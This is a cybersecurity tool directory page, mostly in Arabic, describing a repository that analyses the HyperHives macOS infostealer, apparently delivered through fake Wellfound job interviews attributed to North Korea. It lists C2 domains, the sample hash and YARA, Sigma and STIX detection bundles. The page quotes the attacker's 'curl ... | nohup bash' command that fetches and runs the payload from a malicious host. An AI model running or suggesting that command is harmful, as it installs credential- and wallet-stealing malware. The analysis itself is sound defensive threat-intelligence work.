Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
hyperhives-macos-infostealer-analysis — تحليل ثابت كامل لـ HyperHives أداة سرقة المعلومات Rust الخاصة بـ macOS — 571 قيمة تكوين مفكوكة، بنية تحتية لـ C2، إسناد إلى DPRK/Contagious Interview، قواعد YARA/Sigma، حزمة STIX 2.1، طبقة ATT&CK Navigator | Kitploit
أدوات/GitHubGitHub/darksp33d/hyperhives-macos-infostealer-analysis
إدارة مؤشرات الاختراق (IOC)الاستخبارات مفتوحة المصدر (OSINT)الهندسة العكسيةالتحقيق الجنائي الرقميتحليل البرمجيات الخبيثةاستخبارات التهديداتالأوراق والأبحاثالتعلم والتعليمموارد منسقة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHubdarksp33d/hyperhives-macos-infostealer-analysis

hyperhives-macos-infostealer-analysis

تحليل ثابت كامل لـ HyperHives أداة سرقة المعلومات Rust الخاصة بـ macOS — 571 قيمة تكوين مفكوكة، بنية تحتية لـ C2، إسناد إلى DPRK/Contagious Interview، قواعد YARA/Sigma، حزمة STIX 2.1، طبقة ATT&CK Navigator

عرض المستودعالموقع الإلكتروني
31412منذ 5 أشهرتمت المراجعة من قبل Kitploit

HyperHives macOS Infostealer — تحليل تقني كامل

تحقق من المستودع الترخيص: MIT STIX 2.1 ATT&CK Navigator

معلومات التهديدات: برنامج استخراج معلومات (infostealer) ثنائي عالمي لنظام macOS مبني بلغة Rust، تم توصيله عبر مسار مقابلة عمل وهمي على Wellfound (المعروفة سابقًا بـ AngelList). قام شخصية المشغل "Felix" من "HyperHive" بإغراء الأهداف لتنفيذ مثبت ضار من macos.hyperhives.net. يوثق هذا المستودع التحليل الثابت الكامل: تم استرداد 571 قيمة تكوين مشفرة، بما في ذلك عناوين C2 وSentry DSN و 276 معرفًا مستهدفًا من إضافات Chrome.

SHA-256 العينة5c7385c3a4d919d30e81d851d87068dfcc4d9c5489f1c2b06da6904614bf8dd3
نطاق C2cloudproxy.link
نطاق التوصيلmacos.hyperhives.net
منصة الإغراءWellfound (المعروفة سابقًا بـ AngelList)
شخصية المشغل"Felix" في "HyperHive"
VirusTotal9 / 63 كشف
التصنيفكشف عام / حزمة مؤشرات (IOC bundle)
آخر تحديثأبريل 2026

المحتويات

  • حزم معلومات التهديدات
  • هيكل المستودع
  • بداية سريعة
  • الخلاصة المختصرة
  • 1 — كيف بدأ الأمر
  • 2 — الثنائي
  • 3 — ما يسرقه
  • 4 — بنية C2 المفكوكة
  • 5 — الإسناد
  • 6 — تحليل التشفير
  • 7 — رسم خرائط MITRE ATT&CK
  • 8 — مرجع المحافظ ومعرفات الإضافات
  • 9 — الإجراءات الموصى بها
  • 10 — المنهجية
  • الملحق أ — جميع معرفات إضافات Chrome الـ 276
  • النطاق والقيود
  • سجل الإصدارات
  • المساهمة
  • الترخيص

حزم معلومات التهديدات

الملفالصيغةالغرض
iocs.txtنص عاديالتجزئات (Hashes)، النطاقات، عناوين URL، عناوين IP، البريد الإلكتروني، معرفات Sentry — لصقها في قوائم الحظر، MISP، OpenCTI
yara_rules.yarYARA 4.2+تطابق تجزئة العينة المعروفة + كشف السلاسل الاسترشادية لـ Mach-O
sigma_rules.ymlSigmaقواعد الوكيل (Proxy)، DNS، وإنشاء العمليات — اضبط logsource لنظام SIEM الخاص بك
stix/bundle.jsonSTIX 2.1حزمة CTI قابلة للقراءة آليًا تحتوي على مؤشرات، SDO للبرامج الضارة، البنية التحتية، أنماط ATT&CK، والعلاقات
attack-navigator-layer.jsonATT&CK Navigatorاستيراد إلى مستعرض ATT&CK للحصول على تغطية تقنية مرئية

هيكل المستودع```

. ├── README.md # This report ├── iocs.txt # Flat IOC list ├── yara_rules.yar # YARA detection rules ├── sigma_rules.yml # Sigma detection rules ├── stix/ │ └── bundle.json # STIX 2.1 threat-intelligence bundle ├── attack-navigator-layer.json # ATT&CK Navigator layer ├── output/ │ ├── full_decrypted_config.json # Machine-readable decrypted configuration │ ├── iocs.json # Structured IOC export │ ├── c2_protocol.txt # C2 protocol field documentation │ ├── cargo_dependencies.txt # Embedded Rust crate list (97 crates) │ ├── source_map.txt # Reconstructed source-file layout │ └── targets.txt # Targeted applications and data paths ├── scripts/ │ ├── decrypt_all.py # Definitive config decryptor (Unicorn emulation) │ ├── analyze.py # Static analysis driver │ ├── extract_all.py # String and structure extractor │ ├── r2_analyze.py # Radare2 analysis automation │ ├── r2_targeted.py # Targeted R2 analysis for helpers │ └── validate_repo.py # CI validation script ├── sample/ │ └── README.md # Instructions for sample placement ├── Dockerfile # Analysis container image ├── docker-compose.yml # Air-gapped compose config ├── lab.sh # Helper script for Docker lab ├── SECURITY.md # Safe handling and vulnerability reporting ├── CONTRIBUTING.md # Contribution guidelines ├── CHANGELOG.md # Release history ├── LICENSE # MIT └── .github/ ├── workflows/validate.yml # CI: YARA + Sigma + file checks ├── ISSUE_TEMPLATE/ # Structured issue forms └── PULL_REQUEST_TEMPLATE.md # PR checklist

---

## بدء سريع

ضع العينة كـ `sample/installer_binary` (راجع [`sample/README.md`](https://github.com/darksp33d/hyperhives-macos-infostealer-analysis/blob/main/sample/README.md) للتحقق من التجزئة)، ثم:```bash
docker compose build
docker compose run --rm lab python3 /lab/scripts/decrypt_all.py

يقوم ملف compose بفرض network_mode: none و read_only: true، ويسقط جميع قدرات Linux. راجع SECURITY.md للإرشادات الكاملة حول التعامل.


TL;DR

أدى إعلان وظيفة على Wellfound (المعروفة سابقًا باسم AngelList) إلى سلسلة من رسائل البريد الإلكتروني للهندسة الاجتماعية من شخصية مشغل تدعى "Felix" في "HyperHive". بعد الإطراء على الخلفية التقنية للهدف وتحديد مقابلة وهمية، وجه المهاجم الضحية إلى "مراجعة المنتج" على hyperhives.net وتحديدًا فحص الإعدادات → التشخيص → السجل — كذريعة لتنفيذ:``` curl -s https://macos.hyperhives.net/install | nohup bash &

الحمولة هي **ثنائي عالمي Mach-O بحجم 8.5 ميغابايت** (x86_64 + arm64) مترجم بلغة Rust. التحليل الثابت باستخدام مختبر Docker معزول ومحاكاة CPU لـ **570 روتين مساعد فريد من نوع x86_64** كشف عن **جميع قيم التكوين المشفرة البالغ عددها 571**، مما أظهر:

- **C2:** `cloudproxy.link` — أربعة نقاط نهاية HTTPS
- **Sentry (إسناد التتبع):** DSN كامل مع معرفات المؤسسة/المشروع على `ingest.de.sentry.io`
- **هوية البناء:** مستخدم Cargo `rootr`، اسم الكود `force`، الإصدار `9.12.1`
- **الأهداف:** 276 معرف إضافات Chrome (محافظ العملات الرقمية، مديري كلمات المرور، بيانات اعتماد الشركات)

تتوافق التكتيكات مع حملات **مقابلة معدية المرتبطة بكوريا الشمالية (DPRK)** — مقابلات وظائف وهمية على منصات مشروعة، بناء ثقة متعدد الخطوات، تسليم عبر `curl | bash`، أداة سرقة لـ macOS بلغة Rust، واستخراج بيانات يركز على العملات الرقمية.

---

## 1 — كيف بدأ الأمر

### الطُعم: مقابلة وظيفة وهمية على Wellfound

بدأ الهجوم بـ **إعلان وظيفة شرعي المظهر على Wellfound** (المعروفة سابقًا باسم AngelList). بعد أن تقدم الهدف بطلب، جرت سلسلة البريد الإلكتروني التالية من مشغل يستخدم شخصية **"Felix"** واسم الشركة **"HyperHive"**:

**البريد الإلكتروني 1** (4 أبريل 2026) — الاتصال الأولي. أقر "Felix" بالسيرة الذاتية للهدف وملف LinkedIn الخاص به، وادعى أن "Tech Lead" الخاص بهم وافق على المضي قدمًا، وأشار تحديدًا إلى الخبرة الفنية الحقيقية للهدف. ذكر البريد الإلكتروني أن HyperHive "تبني نسخة سطح المكتب من Hyperhives عبر أنظمة تشغيل مختلفة" ودعا الهدف إلى جدولة مقابلة في UTC+0.
تنزيل الأداة